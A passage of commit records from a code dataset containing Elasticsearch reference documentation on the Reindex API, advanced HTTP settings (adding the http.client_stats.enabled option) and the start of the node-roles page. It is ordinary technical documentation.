_cluster\\\/health?wait_for_status=yellow\\n\/]\n\n[float]\n=== URL Parameters\n\nIn addition to the standard parameters like `pretty`, the Reindex API also\nsupports `refresh`, `wait_for_completion`, `consistency`, `timeout`, and\n`requests_per_second`.\n\nSending the `refresh` url parameter will cause all indexes to which the request\nwrote to be refreshed. This is different than the Index API's `refresh`\nparameter which causes just the shard that received the new data to be indexed.\n\nIf the request contains `wait_for_completion=false` then Elasticsearch will\nperform some preflight checks, launch the request, and then return a `task`\nwhich can be used with <<docs-reindex-task-api,Tasks APIs>> to cancel or get\nthe status of the task. For now, once the request is finished the task is gone\nand the only place to look for the ultimate result of the task is in the\nElasticsearch log file. This will be fixed soon.\n\n`consistency` controls how many copies of a shard must respond to each write\nrequest. `timeout` controls how long each write request waits for unavailable\nshards to become available. Both work exactly how they work in the\n<<docs-bulk,Bulk API>>.\n\n`requests_per_second` can be set to any decimal number (`1.4`, `6`, `1000`, etc)\nand throttles the number of requests per second that the reindex issues. The\nthrottling is done waiting between bulk batches so that it can manipulate the\nscroll timeout. The wait time is the difference between the time it took the\nbatch to complete and the time `requests_per_second * requests_in_the_batch`.\nSince the batch isn't broken into multiple bulk requests large batch sizes will\ncause Elasticsearch to create many requests and then wait for a while before\nstarting the next set. This is \"bursty\" instead of \"smooth\". 
The default is\n`unlimited` which is also the only non-number value that it accepts.\n\n[float]\n=== Response body\n\nThe JSON response looks like this:\n\n[source,js]\n--------------------------------------------------\n{\n \"took\" : 639,\n \"updated\": 0,\n \"created\": 123,\n \"batches\": 1,\n \"version_conflicts\": 2,\n \"retries\": {\n \"bulk\": 0,\n \"search\": 0\n }\n \"throttled_millis\": 0,\n \"failures\" : [ ]\n}\n--------------------------------------------------\n\n`took`::\n\nThe number of milliseconds from start to end of the whole operation.\n\n`updated`::\n\nThe number of documents that were successfully updated.\n\n`created`::\n\nThe number of documents that were successfully created.\n\n`batches`::\n\nThe number of scroll responses pulled back by the the reindex.\n\n`version_conflicts`::\n\nThe number of version conflicts that reindex hit.\n\n`retries`::\n\nThe number of retries attempted by reindex. `bulk` is the number of bulk\nactions retried and `search` is the number of search actions retried.\n\n`throttled_millis`::\n\nNumber of milliseconds the request slept to conform to `requests_per_second`.\n\n`failures`::\n\nArray of all indexing failures. If this is non-empty then the request aborted\nbecause of those failures. See `conflicts` for how to prevent version conflicts\nfrom aborting the operation.\n\n[float]\n[[docs-reindex-task-api]]\n=== Works with the Task API\n\nWhile Reindex is running you can fetch their status using the\n<<tasks,Task API>>:\n\n[source,js]\n--------------------------------------------------\nGET _tasks?detailed=true&actions=*reindex\n--------------------------------------------------\n\/\/ CONSOLE\n\nThe responses looks like:\n\n[source,js]\n--------------------------------------------------\n{\n \"nodes\" : {\n \"r1A2WoRbTwKZ516z6NEs5A\" : {\n \"name\" : \"Tyrannus\",\n \"transport_address\" : \"127.0.0.1:9300\",\n \"host\" : \"127.0.0.1\",\n \"ip\" : \"127.0.0.1:9300\",\n \"attributes\" : {\n \"testattr\" : \"test\",\n \"portsfile\" : \"true\"\n },\n \"tasks\" : {\n \"r1A2WoRbTwKZ516z6NEs5A:36619\" : {\n \"node\" : \"r1A2WoRbTwKZ516z6NEs5A\",\n \"id\" : 36619,\n \"type\" : \"transport\",\n \"action\" : \"indices:data\/write\/reindex\",\n \"status\" : { <1>\n \"total\" : 6154,\n \"updated\" : 3500,\n \"created\" : 0,\n \"deleted\" : 0,\n \"batches\" : 4,\n \"version_conflicts\" : 0,\n \"noops\" : 0,\n \"retries\": {\n \"bulk\": 0,\n \"search\": 0\n },\n \"throttled_millis\": 0\n },\n \"description\" : \"\"\n }\n }\n }\n }\n}\n--------------------------------------------------\n\n<1> this object contains the actual status. It is just like the response json\nwith the important addition of the `total` field. `total` is the total number\nof operations that the reindex expects to perform. You can estimate the\nprogress by adding the `updated`, `created`, and `deleted` fields. The request\nwill finish when their sum is equal to the `total` field.\n\n\n[float]\n[[docs-reindex-cancel-task-api]]\n=== Works with the Cancel Task API\n\nAny Reindex can be canceled using the <<tasks,Task Cancel API>>:\n\n[source,js]\n--------------------------------------------------\nPOST _tasks\/taskid:1\/_cancel\n--------------------------------------------------\n\/\/ CONSOLE\n\nThe `task_id` can be found using the tasks API above.\n\nCancelation should happen quickly but might take a few seconds. 
The task status\nAPI above will continue to list the task until it is wakes to cancel itself.\n\n\n[float]\n[[docs-reindex-rethrottle]]\n=== Rethrottling\n\nThe value of `requests_per_second` can be changed on a running reindex using\nthe `_rethrottle` API:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\/taskid:1\/_rethrottle?requests_per_second=unlimited\n--------------------------------------------------\n\/\/ CONSOLE\n\nThe `task_id` can be found using the tasks API above.\n\nJust like when setting it on the `_reindex` API `requests_per_second` can be\neither `unlimited` to disable throttling or any decimal number like `1.7` or\n`12` to throttle to that level. Rethrottling that speeds up the query takes\neffect immediately but rethrotting that slows down the query will take effect\non after completing the current batch. This prevents scroll timeouts.\n\n\n[float]\n=== Reindex to change the name of a field\n\n`_reindex` can be used to build a copy of an index with renamed fields. Say you\ncreate an index containing documents that look like this:\n\n[source,js]\n--------------------------------------------------\nPOST test\/test\/1?refresh\n{\n \"text\": \"words words\",\n \"flag\": \"foo\"\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nBut you don't like the name `flag` and want to replace it with `tag`.\n`_reindex` can create the other index for you:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"source\": {\n \"index\": \"test\"\n },\n \"dest\": {\n \"index\": \"test2\"\n },\n \"script\": {\n \"inline\": \"ctx._source.tag = ctx._source.remove(\\\"flag\\\")\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nNow you can get the new document:\n\n[source,js]\n--------------------------------------------------\nGET test2\/test\/1\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nand it'll look like:\n\n[source,js]\n--------------------------------------------------\n{\n \"found\": true,\n \"_id\": \"1\",\n \"_index\": \"test2\",\n \"_type\": \"test\",\n \"_version\": 1,\n \"_source\": {\n \"text\": \"words words\",\n \"tag\": \"foo\"\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE\n\nOr you can search by `tag` or whatever you want.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"579d0367b153693f40b58bcf9477684fe5abfac2","subject":"[DOCS] http.client_stats.enabled setting (#71188)","message":"[DOCS] http.client_stats.enabled setting (#71188)\n\n","repos":"GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch","old_file":"docs\/reference\/modules\/http.asciidoc","new_file":"docs\/reference\/modules\/http.asciidoc","new_contents":"[[http-settings]]\n==== Advanced HTTP settings\n\nUse the following advanced settings to configure the HTTP interface\nindependently of the <<transport-settings,transport interface>>. You can also\nconfigure both interfaces together using the <<common-network-settings,network settings>>.\n\n`http.host`::\n(<<static-cluster-setting,Static>>)\nSets the address of this node for HTTP traffic. The node will bind to this\naddress and will also use it as its HTTP publish address. 
Accepts an IP\naddress, a hostname, or a <<network-interface-values,special value>>.\nUse this setting only if you require different configurations for the\ntransport and HTTP interfaces.\n+\nDefaults to the address given by `network.host`.\n\n`http.bind_host`::\n(<<static-cluster-setting,Static>>)\nThe network address(es) to which the node should bind in order to listen for\nincoming HTTP connections. Accepts a list of IP addresses, hostnames, and\n<<network-interface-values,special values>>. Defaults to the address given by\n`http.host` or `network.bind_host`. Use this setting only if you need to\nbind to multiple addresses or to use different addresses for publishing and\nbinding, and you also require different binding configurations for the\ntransport and HTTP interfaces.\n\n`http.publish_host`::\n(<<static-cluster-setting,Static>>)\nThe network address for HTTP clients to contact the node using sniffing.\nAccepts an IP address, a hostname, or a <<network-interface-values,special\nvalue>>. Defaults to the address given by `http.host` or\n`network.publish_host`. Use this setting only if you need to bind to\nmultiple addresses or to use different addresses for publishing and binding,\nand you also require different binding configurations for the transport and\nHTTP interfaces.\n\n`http.publish_port`::\n(<<static-cluster-setting,Static>>)\nThe port of the <<modules-network-binding-publishing,HTTP publish address>>.\nConfigure this setting only if you need the publish port to be different from\n`http.port`. Defaults to the port assigned via `http.port`.\n\n`http.max_content_length`::\n(<<static-cluster-setting,Static>>)\nMaximum size of an HTTP request body. Defaults to `100mb`.\n\n`http.max_initial_line_length`::\n(<<static-cluster-setting,Static>>)\nMaximum size of an HTTP URL. Defaults to `4kb`.\n\n`http.max_header_size`::\n(<<static-cluster-setting,Static>>)\nMaximum size of allowed headers. Defaults to `8kb`.\n\n[[http-compression]]\n\/\/ tag::http-compression-tag[]\n`http.compression` {ess-icon}::\n(<<static-cluster-setting,Static>>)\nSupport for compression when possible (with Accept-Encoding). If HTTPS is enabled, defaults to `false`. Otherwise, defaults to `true`.\n+\nDisabling compression for HTTPS mitigates potential security risks, such as a\n{wikipedia}\/BREACH[BREACH attack]. To compress HTTPS traffic,\nyou must explicitly set `http.compression` to `true`.\n\/\/ end::http-compression-tag[]\n\n`http.compression_level`::\n(<<static-cluster-setting,Static>>)\nDefines the compression level to use for HTTP responses. Valid values are in the range of 1 (minimum compression) and 9 (maximum compression). Defaults to `3`.\n\n[[http-cors-enabled]]\n\/\/ tag::http-cors-enabled-tag[]\n`http.cors.enabled` {ess-icon}::\n(<<static-cluster-setting,Static>>)\nEnable or disable cross-origin resource sharing, which determines whether a browser on another origin can execute requests against {es}. Set to `true` to enable {es} to process pre-flight\n{wikipedia}\/Cross-origin_resource_sharing[CORS] requests.\n{es} will respond to those requests with the `Access-Control-Allow-Origin` header if the `Origin` sent in the request is permitted by the `http.cors.allow-origin` list. 
Set to `false` (the default) to make {es} ignore the `Origin` request header, effectively disabling CORS requests because {es} will never respond with the `Access-Control-Allow-Origin` response header.\n+\nNOTE: If the client does not send a pre-flight request with an `Origin` header or it does not check the response headers from the server to validate the\n`Access-Control-Allow-Origin` response header, then cross-origin security is\ncompromised. If CORS is not enabled on {es}, the only way for the client to know is to send a pre-flight request and realize the required response headers are missing.\n\n\/\/ end::http-cors-enabled-tag[]\n\n[[http-cors-allow-origin]]\n\/\/ tag::http-cors-allow-origin-tag[]\n`http.cors.allow-origin` {ess-icon}::\n(<<static-cluster-setting,Static>>)\nWhich origins to allow. If you prepend and append a forward slash (`\/`) to the value, this will be treated as a regular expression, allowing you to support HTTP and HTTPs. For example, using `\/https?:\\\/\\\/localhost(:[0-9]+)?\/` would return the request header appropriately in both cases. Defaults to no origins allowed.\n+\nIMPORTANT: A wildcard (`*`) is a valid value but is considered a security risk, as your {es} instance is open to cross origin requests from *anywhere*.\n\n\/\/ end::http-cors-allow-origin-tag[]\n\n[[http-cors-max-age]]\n\/\/ tag::http-cors-max-age-tag[]\n`http.cors.max-age` {ess-icon}::\n(<<static-cluster-setting,Static>>)\nBrowsers send a \"preflight\" OPTIONS-request to determine CORS settings. `max-age` defines how long the result should be cached for. Defaults to `1728000` (20 days).\n\/\/ end::http-cors-max-age-tag[]\n\n[[http-cors-allow-methods]]\n\/\/ tag::http-cors-allow-methods-tag[]\n`http.cors.allow-methods` {ess-icon}::\n(<<static-cluster-setting,Static>>)\nWhich methods to allow. Defaults to `OPTIONS, HEAD, GET, POST, PUT, DELETE`.\n\/\/ end::http-cors-allow-methods-tag[]\n\n[[http-cors-allow-headers]]\n\/\/ tag::http-cors-allow-headers-tag[]\n`http.cors.allow-headers` {ess-icon}::\n(<<static-cluster-setting,Static>>)\nWhich headers to allow. Defaults to `X-Requested-With, Content-Type, Content-Length`.\n\/\/ end::http-cors-allow-headers-tag[]\n\n[[http-cors-allow-credentials]]\n\/\/ tag::http-cors-allow-credentials-tag[]\n`http.cors.allow-credentials` {ess-icon}::\n(<<static-cluster-setting,Static>>)\nWhether the `Access-Control-Allow-Credentials` header should be returned. Defaults to `false`.\n+\nNOTE: This header is only returned when the setting is set to `true`.\n\n\/\/ end::http-cors-allow-credentials-tag[]\n\n`http.detailed_errors.enabled`::\n(<<static-cluster-setting,Static>>)\nIf `true`, enables the output of detailed error messages and stack traces in the response output. Defaults to `true`.\n+\nIf `false`, use the `error_trace` parameter to <<common-options-error-options,enable stack traces>> and return detailed error messages. Otherwise, only a simple message will be returned.\n\n`http.pipelining.max_events`::\n(<<static-cluster-setting,Static>>)\nThe maximum number of events to be queued up in memory before an HTTP connection is closed, defaults to `10000`.\n\n`http.max_warning_header_count`::\n(<<static-cluster-setting,Static>>)\nThe maximum number of warning headers in client HTTP responses. Defaults to `unbounded`.\n\n`http.max_warning_header_size`::\n(<<static-cluster-setting,Static>>)\nThe maximum total size of warning headers in client HTTP responses. 
Defaults to `unbounded`.\n\n`http.tcp.no_delay`::\n(<<static-cluster-setting,Static>>)\nEnable or disable the {wikipedia}\/Nagle%27s_algorithm[TCP no delay]\nsetting. Defaults to `network.tcp.no_delay`.\n\n`http.tcp.keep_alive`::\n(<<static-cluster-setting,Static>>)\nConfigures the `SO_KEEPALIVE` option for this socket, which\ndetermines whether it sends TCP keepalive probes.\nDefaults to `network.tcp.keep_alive`.\n\n`http.tcp.keep_idle`::\n(<<static-cluster-setting,Static>>) Configures the `TCP_KEEPIDLE` option for this socket, which\ndetermines the time in seconds that a connection must be idle before\nstarting to send TCP keepalive probes. Defaults to `network.tcp.keep_idle`, which\nuses the system default. This value cannot exceed `300` seconds. Only applicable on\nLinux and macOS, and requires Java 11 or newer.\n\n`http.tcp.keep_interval`::\n(<<static-cluster-setting,Static>>) Configures the `TCP_KEEPINTVL` option for this socket,\nwhich determines the time in seconds between sending TCP keepalive probes.\nDefaults to `network.tcp.keep_interval`, which uses the system default.\nThis value cannot exceed `300` seconds. Only applicable on Linux and macOS, and requires\nJava 11 or newer.\n\n`http.tcp.keep_count`::\n(<<static-cluster-setting,Static>>) Configures the `TCP_KEEPCNT` option for this socket, which\ndetermines the number of unacknowledged TCP keepalive probes that may be\nsent on a connection before it is dropped. Defaults to `network.tcp.keep_count`,\nwhich uses the system default. Only applicable on Linux and macOS, and\nrequires Java 11 or newer.\n\n`http.tcp.reuse_address`::\n(<<static-cluster-setting,Static>>)\nShould an address be reused or not. Defaults to `network.tcp.reuse_address`.\n\n`http.tcp.send_buffer_size`::\n(<<static-cluster-setting,Static>>)\nThe size of the TCP send buffer (specified with <<size-units,size units>>).\nDefaults to `network.tcp.send_buffer_size`.\n\n`http.tcp.receive_buffer_size`::\n(<<static-cluster-setting,Static>>)\nThe size of the TCP receive buffer (specified with <<size-units,size units>>).\nDefaults to `network.tcp.receive_buffer_size`.\n\n`http.client_stats.enabled`::\n(<<dynamic-cluster-setting,Dynamic>>)\nEnable or disable collection of HTTP client stats. Defaults to `true`.\n","old_contents":"[[http-settings]]\n==== Advanced HTTP settings\n\nUse the following advanced settings to configure the HTTP interface\nindependently of the <<transport-settings,transport interface>>. You can also\nconfigure both interfaces together using the <<common-network-settings,network settings>>.\n\n`http.host`::\n(<<static-cluster-setting,Static>>)\nSets the address of this node for HTTP traffic. The node will bind to this\naddress and will also use it as its HTTP publish address. Accepts an IP\naddress, a hostname, or a <<network-interface-values,special value>>.\nUse this setting only if you require different configurations for the\ntransport and HTTP interfaces.\n+\nDefaults to the address given by `network.host`.\n\n`http.bind_host`::\n(<<static-cluster-setting,Static>>)\nThe network address(es) to which the node should bind in order to listen for\nincoming HTTP connections. Accepts a list of IP addresses, hostnames, and\n<<network-interface-values,special values>>. Defaults to the address given by\n`http.host` or `network.bind_host`. 
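\n+\nFor example, a node behind a NAT gateway might bind to all local interfaces while publishing one routable address (both addresses are illustrative):\n+\n[source,yaml]\n-------------------\nhttp.bind_host: 0.0.0.0\nhttp.publish_host: 192.0.2.10\n-------------------\n+\n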
Use this setting only if you require to\nbind to multiple addresses or to use different addresses for publishing and\nbinding, and you also require different binding configurations for the\ntransport and HTTP interfaces.\n\n`http.publish_host`::\n(<<static-cluster-setting,Static>>)\nThe network address for HTTP clients to contact the node using sniffing.\nAccepts an IP address, a hostname, or a <<network-interface-values,special\nvalue>>. Defaults to the address given by `http.host` or\n`network.publish_host`. Use this setting only if you require to bind to\nmultiple addresses or to use different addresses for publishing and binding,\nand you also require different binding configurations for the transport and\nHTTP interfaces.\n\n`http.publish_port`::\n(<<static-cluster-setting,Static>>)\nThe port of the <<modules-network-binding-publishing,HTTP publish address>>.\nConfigure this setting only if you need the publish port to be different from\n`http.port`. Defaults to the port assigned via `http.port`.\n\n`http.max_content_length`::\n(<<static-cluster-setting,Static>>)\nMaximum size of an HTTP request body. Defaults to `100mb`.\n\n`http.max_initial_line_length`::\n(<<static-cluster-setting,Static>>)\nMaximum size of an HTTP URL. Defaults to `4kb`.\n\n`http.max_header_size`::\n(<<static-cluster-setting,Static>>)\nMaximum size of allowed headers. Defaults to `8kb`.\n\n[[http-compression]]\n\/\/ tag::http-compression-tag[]\n`http.compression` {ess-icon}::\n(<<static-cluster-setting,Static>>)\nSupport for compression when possible (with Accept-Encoding). If HTTPS is enabled, defaults to `false`. Otherwise, defaults to `true`.\n+\nDisabling compression for HTTPS mitigates potential security risks, such as a\n{wikipedia}\/BREACH[BREACH attack]. To compress HTTPS traffic,\nyou must explicitly set `http.compression` to `true`.\n\/\/ end::http-compression-tag[]\n\n`http.compression_level`::\n(<<static-cluster-setting,Static>>)\nDefines the compression level to use for HTTP responses. Valid values are in the range of 1 (minimum compression) and 9 (maximum compression). Defaults to `3`.\n\n[[http-cors-enabled]]\n\/\/ tag::http-cors-enabled-tag[]\n`http.cors.enabled` {ess-icon}::\n(<<static-cluster-setting,Static>>)\nEnable or disable cross-origin resource sharing, which determines whether a browser on another origin can execute requests against {es}. Set to `true` to enable {es} to process pre-flight\n{wikipedia}\/Cross-origin_resource_sharing[CORS] requests.\n{es} will respond to those requests with the `Access-Control-Allow-Origin` header if the `Origin` sent in the request is permitted by the `http.cors.allow-origin` list. Set to `false` (the default) to make {es} ignore the `Origin` request header, effectively disabling CORS requests because {es} will never respond with the `Access-Control-Allow-Origin` response header.\n+\nNOTE: If the client does not send a pre-flight request with an `Origin` header or it does not check the response headers from the server to validate the\n`Access-Control-Allow-Origin` response header, then cross-origin security is\ncompromised. If CORS is not enabled on {es}, the only way for the client to know is to send a pre-flight request and realize the required response headers are missing.\n\n\/\/ end::http-cors-enabled-tag[]\n\n[[http-cors-allow-origin]]\n\/\/ tag::http-cors-allow-origin-tag[]\n`http.cors.allow-origin` {ess-icon}::\n(<<static-cluster-setting,Static>>)\nWhich origins to allow. 
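\n+\nFor a single fixed origin, a sketch (the origin shown is illustrative):\n+\n[source,yaml]\n-------------------\nhttp.cors.allow-origin: \"https:\/\/kibana.example.org:5601\"\n-------------------\n+\n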
If you prepend and append a forward slash (`\/`) to the value, this will be treated as a regular expression, allowing you to support HTTP and HTTPs. For example, using `\/https?:\\\/\\\/localhost(:[0-9]+)?\/` would return the request header appropriately in both cases. Defaults to no origins allowed.\n+\nIMPORTANT: A wildcard (`*`) is a valid value but is considered a security risk, as your {es} instance is open to cross origin requests from *anywhere*.\n\n\/\/ end::http-cors-allow-origin-tag[]\n\n[[http-cors-max-age]]\n\/\/ tag::http-cors-max-age-tag[]\n`http.cors.max-age` {ess-icon}::\n(<<static-cluster-setting,Static>>)\nBrowsers send a \"preflight\" OPTIONS-request to determine CORS settings. `max-age` defines how long the result should be cached for. Defaults to `1728000` (20 days).\n\/\/ end::http-cors-max-age-tag[]\n\n[[http-cors-allow-methods]]\n\/\/ tag::http-cors-allow-methods-tag[]\n`http.cors.allow-methods` {ess-icon}::\n(<<static-cluster-setting,Static>>)\nWhich methods to allow. Defaults to `OPTIONS, HEAD, GET, POST, PUT, DELETE`.\n\/\/ end::http-cors-allow-methods-tag[]\n\n[[http-cors-allow-headers]]\n\/\/ tag::http-cors-allow-headers-tag[]\n`http.cors.allow-headers` {ess-icon}::\n(<<static-cluster-setting,Static>>)\nWhich headers to allow. Defaults to `X-Requested-With, Content-Type, Content-Length`.\n\/\/ end::http-cors-allow-headers-tag[]\n\n[[http-cors-allow-credentials]]\n\/\/ tag::http-cors-allow-credentials-tag[]\n`http.cors.allow-credentials` {ess-icon}::\n(<<static-cluster-setting,Static>>)\nWhether the `Access-Control-Allow-Credentials` header should be returned. Defaults to `false`.\n+\nNOTE: This header is only returned when the setting is set to `true`.\n\n\/\/ end::http-cors-allow-credentials-tag[]\n\n`http.detailed_errors.enabled`::\n(<<static-cluster-setting,Static>>)\nIf `true`, enables the output of detailed error messages and stack traces in the response output. Defaults to `true`.\n+\nIf `false`, use the `error_trace` parameter to <<common-options-error-options,enable stack traces>> and return detailed error messages. Otherwise, only a simple message will be returned.\n\n`http.pipelining.max_events`::\n(<<static-cluster-setting,Static>>)\nThe maximum number of events to be queued up in memory before an HTTP connection is closed, defaults to `10000`.\n\n`http.max_warning_header_count`::\n(<<static-cluster-setting,Static>>)\nThe maximum number of warning headers in client HTTP responses. Defaults to `unbounded`.\n\n`http.max_warning_header_size`::\n(<<static-cluster-setting,Static>>)\nThe maximum total size of warning headers in client HTTP responses. Defaults to `unbounded`.\n\n`http.tcp.no_delay`::\n(<<static-cluster-setting,Static>>)\nEnable or disable the {wikipedia}\/Nagle%27s_algorithm[TCP no delay]\nsetting. Defaults to `network.tcp.no_delay`.\n\n`http.tcp.keep_alive`::\n(<<static-cluster-setting,Static>>)\nConfigures the `SO_KEEPALIVE` option for this socket, which\ndetermines whether it sends TCP keepalive probes.\nDefaults to `network.tcp.keep_alive`.\n\n`http.tcp.keep_idle`::\n(<<static-cluster-setting,Static>>) Configures the `TCP_KEEPIDLE` option for this socket, which\ndetermines the time in seconds that a connection must be idle before\nstarting to send TCP keepalive probes. Defaults to `network.tcp.keep_idle`, which\nuses the system default. This value cannot exceed `300` seconds. 
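\n+\nFor example, to start sending probes after one minute of idleness (a sketch; the value is illustrative):\n+\n[source,yaml]\n-------------------\nhttp.tcp.keep_alive: true\nhttp.tcp.keep_idle: 60\n-------------------\n+\n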
Only applicable on\nLinux and macOS, and requires Java 11 or newer.\n\n`http.tcp.keep_interval`::\n(<<static-cluster-setting,Static>>) Configures the `TCP_KEEPINTVL` option for this socket,\nwhich determines the time in seconds between sending TCP keepalive probes.\nDefaults to `network.tcp.keep_interval`, which uses the system default.\nThis value cannot exceed `300` seconds. Only applicable on Linux and macOS, and requires\nJava 11 or newer.\n\n`http.tcp.keep_count`::\n(<<static-cluster-setting,Static>>) Configures the `TCP_KEEPCNT` option for this socket, which\ndetermines the number of unacknowledged TCP keepalive probes that may be\nsent on a connection before it is dropped. Defaults to `network.tcp.keep_count`,\nwhich uses the system default. Only applicable on Linux and macOS, and\nrequires Java 11 or newer.\n\n`http.tcp.reuse_address`::\n(<<static-cluster-setting,Static>>)\nShould an address be reused or not. Defaults to `network.tcp.reuse_address`.\n\n`http.tcp.send_buffer_size`::\n(<<static-cluster-setting,Static>>)\nThe size of the TCP send buffer (specified with <<size-units,size units>>).\nDefaults to `network.tcp.send_buffer_size`.\n\n`http.tcp.receive_buffer_size`::\n(<<static-cluster-setting,Static>>)\nThe size of the TCP receive buffer (specified with <<size-units,size units>>).\nDefaults to `network.tcp.receive_buffer_size`.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b33c444db5b10194f16e5de6d1f70c850f30b4d6","subject":"Shows how to disable CCS from dedicated master\/data (#26860)","message":"Shows how to disable CCS from dedicated master\/data (#26860)\n\nThis is really just the last bit of the OSS component of https:\/\/github.com\/elastic\/elasticsearch\/issues\/25210","repos":"maddin2016\/elasticsearch,qwerty4030\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,qwerty4030\/elasticsearch,fred84\/elasticsearch,scorpionvicky\/elasticsearch,pozhidaevak\/elasticsearch,gfyoung\/elasticsearch,kalimatas\/elasticsearch,pozhidaevak\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,pozhidaevak\/elasticsearch,qwerty4030\/elasticsearch,wenpos\/elasticsearch,gingerwizard\/elasticsearch,fred84\/elasticsearch,kalimatas\/elasticsearch,scorpionvicky\/elasticsearch,maddin2016\/elasticsearch,wangtuo\/elasticsearch,s1monw\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,scottsom\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,coding0011\/elasticsearch,kalimatas\/elasticsearch,pozhidaevak\/elasticsearch,rajanm\/elasticsearch,masaruh\/elasticsearch,HonzaKral\/elasticsearch,markwalkom\/elasticsearch,scottsom\/elasticsearch,s1monw\/elasticsearch,wenpos\/elasticsearch,wangtuo\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,markwalkom\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,s1monw\/elasticsearch,GlenRSmith\/elasticsearch,mjason3\/elasticsearch,s1monw\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,wangtuo\/elasticsearch,mjason3\/elasticsearch,gingerwizard\/elasticsearch,rajanm\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,mjason3\/elasticsearch,scorpionvicky\/elasticsearch,kalimatas\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,fred84\/elasticsearch,uschindler\/elasticsearch,rajanm\/elasticsearch,robin13\/elasticsearch,fred84\/elasticsearch,qwerty4030\/elasticsearch,uschindler\/el
asticsearch,HonzaKral\/elasticsearch,scottsom\/elasticsearch,wenpos\/elasticsearch,scorpionvicky\/elasticsearch,masaruh\/elasticsearch,pozhidaevak\/elasticsearch,coding0011\/elasticsearch,masaruh\/elasticsearch,mjason3\/elasticsearch,GlenRSmith\/elasticsearch,markwalkom\/elasticsearch,wangtuo\/elasticsearch,wenpos\/elasticsearch,masaruh\/elasticsearch,uschindler\/elasticsearch,rajanm\/elasticsearch,maddin2016\/elasticsearch,robin13\/elasticsearch,markwalkom\/elasticsearch,wangtuo\/elasticsearch,mjason3\/elasticsearch,kalimatas\/elasticsearch,rajanm\/elasticsearch,masaruh\/elasticsearch,gfyoung\/elasticsearch,qwerty4030\/elasticsearch,wenpos\/elasticsearch,GlenRSmith\/elasticsearch,scottsom\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,markwalkom\/elasticsearch,nknize\/elasticsearch,maddin2016\/elasticsearch,maddin2016\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,s1monw\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,HonzaKral\/elasticsearch,markwalkom\/elasticsearch,rajanm\/elasticsearch,scottsom\/elasticsearch,gingerwizard\/elasticsearch,fred84\/elasticsearch","old_file":"docs\/reference\/modules\/node.asciidoc","new_file":"docs\/reference\/modules\/node.asciidoc","new_contents":"[[modules-node]]\n== Node\n\nAny time that you start an instance of Elasticsearch, you are starting a\n_node_. A collection of connected nodes is called a\n<<modules-cluster,cluster>>. If you are running a single node of Elasticsearch,\nthen you have a cluster of one node.\n\nEvery node in the cluster can handle <<modules-http,HTTP>> and\n<<modules-transport,Transport>> traffic by default. The transport layer\nis used exclusively for communication between nodes and the\n{javaclient}\/transport-client.html[Java `TransportClient`]; the HTTP layer is\nused only by external REST clients.\n\nAll nodes know about all the other nodes in the cluster and can forward client\nrequests to the appropriate node. Besides that, each node serves one or more\npurpose:\n\n<<master-node,Master-eligible node>>::\n\nA node that has `node.master` set to `true` (default), which makes it eligible\nto be <<modules-discovery-zen,elected as the _master_ node>>, which controls\nthe cluster.\n\n<<data-node,Data node>>::\n\nA node that has `node.data` set to `true` (default). Data nodes hold data and\nperform data related operations such as CRUD, search, and aggregations.\n\n<<ingest,Ingest node>>::\n\nA node that has `node.ingest` set to `true` (default). Ingest nodes are able\nto apply an <<pipeline,ingest pipeline>> to a document in order to transform\nand enrich the document before indexing. With a heavy ingest load, it makes\nsense to use dedicated ingest nodes and to mark the master and data nodes as\n`node.ingest: false`.\n\n<<modules-tribe,Tribe node>>::\n\nA tribe node, configured via the `tribe.*` settings, is a special type of\ncoordinating only node that can connect to multiple clusters and perform\nsearch and other operations across all connected clusters.\n\nBy default a node is a master-eligible node and a data node, plus it can\npre-process documents through ingest pipelines. 
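\n\nSpelled out as settings, these defaults amount to the following (a sketch of the implicit values; there is no need to set them explicitly):\n\n[source,yaml]\n-------------------\nnode.master: true\nnode.data: true\nnode.ingest: true\n-------------------\n\n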
This is very convenient for\nsmall clusters but, as the cluster grows, it becomes important to consider\nseparating dedicated master-eligible nodes from dedicated data nodes.\n\n[NOTE]\n[[coordinating-node]]\n.Coordinating node\n===============================================\n\nRequests like search requests or bulk-indexing requests may involve data held\non different data nodes. A search request, for example, is executed in two\nphases which are coordinated by the node which receives the client request --\nthe _coordinating node_.\n\nIn the _scatter_ phase, the coordinating node forwards the request to the data\nnodes which hold the data. Each data node executes the request locally and\nreturns its results to the coordinating node. In the _gather_ phase, the\ncoordinating node reduces each data node's results into a single global\nresultset.\n\nEvery node is implicitly a coordinating node. This means that a node that has\nall three `node.master`, `node.data` and `node.ingest` set to `false` will\nonly act as a coordinating node, which cannot be disabled. As a result, such\na node needs to have enough memory and CPU in order to deal with the gather\nphase.\n\n===============================================\n\n[float]\n[[master-node]]\n=== Master Eligible Node\n\nThe master node is responsible for lightweight cluster-wide actions such as\ncreating or deleting an index, tracking which nodes are part of the cluster,\nand deciding which shards to allocate to which nodes. It is important for\ncluster health to have a stable master 